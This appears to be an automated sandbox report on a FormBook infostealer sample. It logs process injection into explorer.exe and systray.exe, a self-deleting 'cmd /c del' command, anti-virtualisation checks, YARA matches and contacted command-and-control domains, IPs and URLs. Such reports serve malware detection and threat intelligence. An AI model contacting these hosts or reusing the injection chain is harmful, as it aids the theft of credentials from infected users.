Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CA185 mov eax, dword ptr fs:[00000030h] 8_2_045CA185
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045BC182 mov eax, dword ptr fs:[00000030h] 8_2_045BC182
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C35A1 mov eax, dword ptr fs:[00000030h] 8_2_045C35A1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0464B260 mov eax, dword ptr fs:[00000030h] 8_2_0464B260
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0464B260 mov eax, dword ptr fs:[00000030h] 8_2_0464B260
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h] 8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h] 8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h] 8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h] 8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D927A mov eax, dword ptr fs:[00000030h] 8_2_045D927A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0464FE3F mov eax, dword ptr fs:[00000030h] 8_2_0464FE3F
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C36CC mov eax, dword ptr fs:[00000030h] 8_2_045C36CC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0464FEC0 mov eax, dword ptr fs:[00000030h] 8_2_0464FEC0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668ED6 mov eax, dword ptr fs:[00000030h] 8_2_04668ED6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C16E0 mov ecx, dword ptr fs:[00000030h] 8_2_045C16E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h] 8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h] 8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h] 8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_046146A7 mov eax, dword ptr fs:[00000030h] 8_2_046146A7
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CD294 mov eax, dword ptr fs:[00000030h] 8_2_045CD294
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CD294 mov eax, dword ptr fs:[00000030h] 8_2_045CD294
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462FE87 mov eax, dword ptr fs:[00000030h] 8_2_0462FE87
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668F6A mov eax, dword ptr fs:[00000030h] 8_2_04668F6A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AEF40 mov eax, dword ptr fs:[00000030h] 8_2_045AEF40
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668B58 mov eax, dword ptr fs:[00000030h] 8_2_04668B58
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0466070D mov eax, dword ptr fs:[00000030h] 8_2_0466070D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0466070D mov eax, dword ptr fs:[00000030h] 8_2_0466070D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CE730 mov eax, dword ptr fs:[00000030h] 8_2_045CE730
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462FF10 mov eax, dword ptr fs:[00000030h] 8_2_0462FF10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462FF10 mov eax, dword ptr fs:[00000030h] 8_2_0462FF10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04594F2E mov eax, dword ptr fs:[00000030h] 8_2_04594F2E
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04594F2E mov eax, dword ptr fs:[00000030h] 8_2_04594F2E
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0465131B mov eax, dword ptr fs:[00000030h] 8_2_0465131B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04665BA5 mov eax, dword ptr fs:[00000030h] 8_2_04665BA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0465138A mov eax, dword ptr fs:[00000030h] 8_2_0465138A
Enables debug privileges
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.secureproductsolutions.net
Source: C:\Windows\explorer.exe Network Connect: 75.119.206.89 80
Source: C:\Windows\explorer.exe Domain query: www.americacivics.com
Source: C:\Windows\explorer.exe Domain query: www.vstarfireworks.com
Source: C:\Windows\explorer.exe Network Connect: 43.249.29.43 80
Source: C:\Windows\explorer.exe Network Connect: 35.186.238.101 80
Source: C:\Windows\explorer.exe Domain query: www.dcsdeliveryaz.website
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Memory written: C:\Users\user\Desktop\ox87DNNM8d.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread APC queued: target process: C:\Windows\explorer.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'
Source: explorer.exe, 00000004.00000000.250657770.0000000005EA0000.00000004.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000004.00000000.237331727.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Users\user\Desktop\ox87DNNM8d.exe VolumeInformation
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE
Behavior Graph:

Behavior Graph ID: 411767  Sample: ox87DNNM8d.exe  Startdate: 12/05/2021  Architecture: WINDOWS  Score: 100

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures

Process tree (as recovered from the graph):
  • ox87DNNM8d.exe (started)
      Dropped file: C:\Users\user\AppData\...\ox87DNNM8d.exe.log, ASCII
      Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
      • ox87DNNM8d.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection)
          • explorer.exe (injected)
              DNS/IP: t181.deegeechina.com 43.249.29.43, 49730, 80 HKKFGL-AS-APHKKwaifongGroupLimitedHK Hong Kong; www.dcsdeliveryaz.website 75.119.206.89, 49720, 80 DREAMHOST-ASUS United States; 3 other IPs or domains
              Signatures: System process connects to network (likely due to code injection or exploit)
              • systray.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe (started)
                      • conhost.exe (started)

Contacted Public IPs

IP              Domain                     Country        ASN     ASN Name                              Malicious
35.186.238.101  www.americacivics.com      United States  15169   GOOGLEUS                              false
75.119.206.89   www.dcsdeliveryaz.website  United States  26347   DREAMHOST-ASUS                        true
43.249.29.43    t181.deegeechina.com       Hong Kong      133115  HKKFGL-AS-APHKKwaifongGroupLimitedHK  true

Contacted Domains

Name IP Active
www.americacivics.com 35.186.238.101 true
t181.deegeechina.com 43.249.29.43 true
www.dcsdeliveryaz.website 75.119.206.89 true
www.secureproductsolutions.net unknown unknown
www.vstarfireworks.com unknown unknown

Contacted URLs

Name  Malicious  Antivirus Detection  Reputation
http://www.vstarfireworks.com/sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da  true  Avira URL Cloud: safe  unknown
http://www.americacivics.com/sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE  false  Avira URL Cloud: safe  unknown
www.panda810.com/sve/  true  Avira URL Cloud: safe  low
http://www.dcsdeliveryaz.website/sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da  true  Avira URL Cloud: safe  unknown